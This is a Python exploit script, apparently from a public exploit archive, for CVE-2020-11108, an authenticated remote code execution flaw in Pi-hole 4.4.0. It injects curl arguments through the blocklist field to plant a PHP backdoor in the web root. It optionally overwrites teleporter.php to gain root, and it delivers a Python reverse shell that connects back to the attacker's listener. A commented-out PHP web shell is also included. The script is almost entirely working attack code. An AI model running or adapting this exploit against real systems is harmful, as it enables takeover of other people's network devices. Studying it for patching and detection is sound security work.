Pi-hole 4.4.0 Remote Code Execution

`# Exploit Title: Pi-hole 4.4.0 - Remote Code Execution (Authenticated)  
# Date: 2020-05-22  
# Exploit Author: Photubias  
# Vendor Advisory: [1] https://github.com/pi-hole/AdminLTE  
# Version: Pi-hole <=4.4.0 + Web <=4.3.3  
# Tested on: Pi-hole v4.4.0-g9e49077, Web v4.3.3,v4.3.2-1-g4f824be, FTL v5.0 (on Debian 10)  
# CVE: CVE-2020-11108  
  
#!/usr/bin/env python3  
'''  
Copyright 2020 Photubias(c)   
This program is free software: you can redistribute it and/or modify  
it under the terms of the GNU General Public License as published by  
the Free Software Foundation, either version 3 of the License, or  
(at your option) any later version.  
  
This program is distributed in the hope that it will be useful,  
but WITHOUT ANY WARRANTY; without even the implied warranty of  
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  
GNU General Public License for more details.  
  
You should have received a copy of the GNU General Public License  
along with this program. If not, see <http://www.gnu.org/licenses/>.  
  
Based (and improved on): https://github.com/Frichetten/CVE-2020-11108-PoC/blob/master/cve-2020-11108-rce.py  
  
File name CVE-2020-11108.py  
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be  
  
## Vulnerable setup instructions (from clean Debian 10-Buster):  
> apt update && apt install -y curl  
> curl -sSL https://install.pi-hole.net | bash  
> pihole checkout web release/v4.3.3  
> cd /etc/.pihole/ && git checkout v4.4  
> pihole -r ## Select reconfigure  
  
This is a native implementation without requirements, written in Python 3.  
Works equally well on Windows as Linux (as MacOS, probably ;-)  
  
Features:  
* Does a reliable check before exploitation (not based on version numbers)  
* Performs normal RCE without Privilege Escalation (wich is more trust worthy)  
* Asks before running Root RCE (as this overwrites certain files)  
* Performs a cleanup in all cases (success / failure)  
'''  
  
import urllib.request, ssl, http.cookiejar, sys, string, random  
import socket, _thread, time  
  
## Default vars; change at will  
_sURL = '192.168.50.130'  
_sPASSWORD = '6DS4QtW5'  
_iTIMEOUT = 5  
_sLOCALIP = '192.168.50.1'  
_sFILENAME = 'fun2.php'  
_sLOCALNCPORT = '4444' ## Make sure to set up a listener on this port first  
  
## Ignore unsigned certs  
ssl._create_default_https_context = ssl._create_unverified_context  
  
## Keep track of cookies between requests  
cj = http.cookiejar.CookieJar()  
oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))  
  
def randomString(iStringLength=8):  
sLetters = string.ascii_lowercase  
return ''.join(random.choice(sLetters) for i in range(iStringLength))  
  
def postData(sURL, lData, bEncode = True):  
try:  
if bEncode: oData = urllib.parse.urlencode(lData).encode()  
else: oData = str(lData).encode()  
oRequest = urllib.request.Request(url = sURL, data = oData)  
return oOpener.open(oRequest, timeout = _iTIMEOUT)  
except:  
print('----- ERROR, site down?')  
sys.exit(1)  
  
def getEndpoint():  
if not _sURL[:4].lower() == 'http': sURL = 'http://' + _sURL  
else: sURL = _sURL  
if not sURL[:-1] == '/': sURL += '/'  
if not '/admin' in sURL: sURL += 'admin'  
try:  
oRequest = urllib.request.Request(sURL)  
oResponse = oOpener.open(oRequest, timeout = _iTIMEOUT)  
except:  
print('[-] Error: ' + sURL + ' not responding')  
exit(1)  
if oResponse.code == 200:  
print('[+] Vulnerable URL is ' + sURL)  
return sURL  
else:  
print('[-] Error: ' + sURL + ' does not exist?')  
exit(1)  
  
def startListener(sPayload, iSockTimeout):  
## Listener must always be on port 80, does not work otherwise  
oSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
print('[!] Binding to '+_sLOCALIP+':80')  
oSock.bind((_sLOCALIP,80))  
oSock.settimeout(iSockTimeout)  
oSock.listen()  
  
while True:  
try: oConn,sAddr= oSock.accept()  
except: break  
print('[+] Yes, we have an incoming connection from '+str(sAddr[0]))  
oConn.sendall(sPayload.encode())  
oConn.close()  
break  
oSock.close()  
print('[!] Closing Listener')  
  
def doLogin(sURL, sPassword):  
sPath = '/index.php?login'  
lData = {'pw':sPassword}  
oResponse = postData(sURL + sPath, lData)  
sResult = oResponse.read().decode(errors='ignore')  
if 'Wrong password' in sResult:  
print('Wrong password')  
sys.exit(1)  
return True  
  
def getToken(sURL):  
sPath = '/settings.php?tab=blocklists'  
oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT)  
sResult = oResponse.read().decode(errors='ignore')  
if 'id=\'token\'' in sResult:  
return sResult.split('id=\'token\' hidden>')[1].split('<')[0]  
else:  
print('[-] Error in getting a token')  
sys.exit(1)  
  
def createBackdoor(sURL, sFilename):  
sToken = getToken(sURL)  
sPath = '/settings.php?tab=blocklists'  
lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o ' + sFilename + ' -d "', 'field':'adlists', 'token':sToken, 'submit':'save'}  
#lData = {'newuserlists':'http://' + _sLOCALIP + '#" -o fun.php -d "', 'field':'adlists', 'token':sToken, 'submit':'saveupdate'}  
oResponse = postData(sURL + sPath, lData)  
if oResponse.code == 200:  
sResult = oResponse.read().decode(errors='ignore')  
arrBlocklists = sResult.split('target="_new"')  
sID = str(len(arrBlocklists)-2)  
print('[+] Creation success, ID is '+sID+'!')  
return sID  
else:  
return ''  
  
  
def doUpdate(sURL):  
sPath = '/scripts/pi-hole/php/gravity.sh.php'  
try:  
oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT)  
if oResponse.code == 200: print('[+] Update succeeded.')  
return True  
except:  
print('[-] Error; callback failed, maybe a firewall issue?')  
return False  
  
def callExploit(sURL, sFilename = _sFILENAME):  
sPath = '/scripts/pi-hole/php/' + sFilename  
print('[+] Calling ' + sURL + sPath)  
try:  
oResponse = oOpener.open(urllib.request.Request(sURL + sPath), timeout = _iTIMEOUT)  
if oResponse.code == 200: print('[+] Calling exploit succeeded.')  
print(oResponse.read().decode(errors='ignore'))  
except:  
pass  
  
def removeEntry(sURL, sID):  
print('[+] Cleaning up now.')  
sToken = getToken(sURL)  
sPath = '/settings.php?tab=blocklists'  
lData = {'adlist-del-'+sID:'on', 'newuserlists':'', 'field':'adlists', 'token':sToken, 'submit':'save'}  
oResponse = postData(sURL + sPath, lData)  
if oResponse.code == 200:  
print('[+] Remove success')  
  
def main():  
global _sURL, _sPASSWORD, _iTIMEOUT, _sLOCALIP, _sFILENAME, _sLOCALNCPORT  
if len(sys.argv) == 1:  
print('[!] No arguments found: python3 CVE-2020-11108.py <dstIP> <srcIP> <PWD>')  
print(' Example: ./CVE-2020-11108.py 192.168.50.130 192.168.50.1 6DS4QtW5')  
print(' But for now, I will ask questions')  
sAnswer = input('[?] Please enter the IP address for Pi-Hole ([' + _sURL + ']): ')  
if not sAnswer == '': _sURL = sAnswer  
sAnswer = input('[?] Please enter the your (reachable) IP address to launch listeners ([' + _sLOCALIP + ']): ')  
if not sAnswer == '': _sLOCALIP = sAnswer  
sAnswer = input('[?] Please enter the password for Pi-Hole ([' + _sPASSWORD + ']): ')  
if not sAnswer == '': _sPASSWORD = sAnswer  
else:  
_sURL = sys.argv[1]  
_sLOCALIP = sys.argv[2]  
_sPASSWORD = sys.argv[3]  
  
## MAIN  
sURL = getEndpoint() ## Will also set the initial SessionID  
doLogin(sURL, _sPASSWORD)  
  
## Creating backdoor (1) ## the old 'fun.php'  
sFilename = randomString() + '.php'  
sID = createBackdoor(sURL, sFilename)  
  
## Launch first payload listener and send 200 OK  
_thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,))  
if doUpdate(sURL):  
print('[+] This system is vulnerable!')  
  
## Question Time  
sAnswer = input('Want to continue with exploitation? (Or just run cleanup)? [y/N]: ')  
if not sAnswer.lower() == 'y':  
removeEntry(sURL, sID)  
sys.exit(0)  
sAnswer = input('Want root access? (Breaks the application!!) [y/N]: ')  
if sAnswer.lower() == 'y': bRoot = True  
else: bRoot = False  
  
if bRoot:  
print('[!] Allright, going for the root shell')  
## Launch payload listener and send root shell  
_sPayload = '''<?php shell_exec("sudo pihole -a -t") ?>'''  
_thread.start_new_thread(startListener,(_sPayload,5,))  
doUpdate(sURL)  
  
## Creating backdoor (2), overwriting teleporter.php  
sID2 = createBackdoor(sURL, 'teleporter.php')  
  
## Launch payload listener for a new 200 OK  
_thread.start_new_thread(startListener,('HTTP/1.1 200 OK\n\nCVE-2020-11108\n',5,))  
doUpdate(sURL)  
  
input('Ok, make sure to have a netcat listener on "' + _sLOCALIP + ':' + _sLOCALNCPORT + '" ("nc -lnvp ' + _sLOCALNCPORT + '") and press enter to continue...')  
  
## Launch shell payload listener:  
_sPayload = '''<?php  
shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'")  
?>  
''' %(_sLOCALIP, _sLOCALNCPORT)  
#_sPayload = '''<?php system($_GET['cmd']); ?>''' ## this works perfectly, but the URL is authenticated  
_thread.start_new_thread(startListener,(_sPayload,5,))  
doUpdate(sURL)  
  
## Launching the payload, will create new PHP file  
callExploit(sURL, sFilename)  
  
## Remove entry again  
if bRoot: removeEntry(sURL, sID2)  
removeEntry(sURL, sID)  
  
if len(sys.argv) == 1: input('[+] All done, press enter to exit')  
  
if __name__ == "__main__":  
main()  
`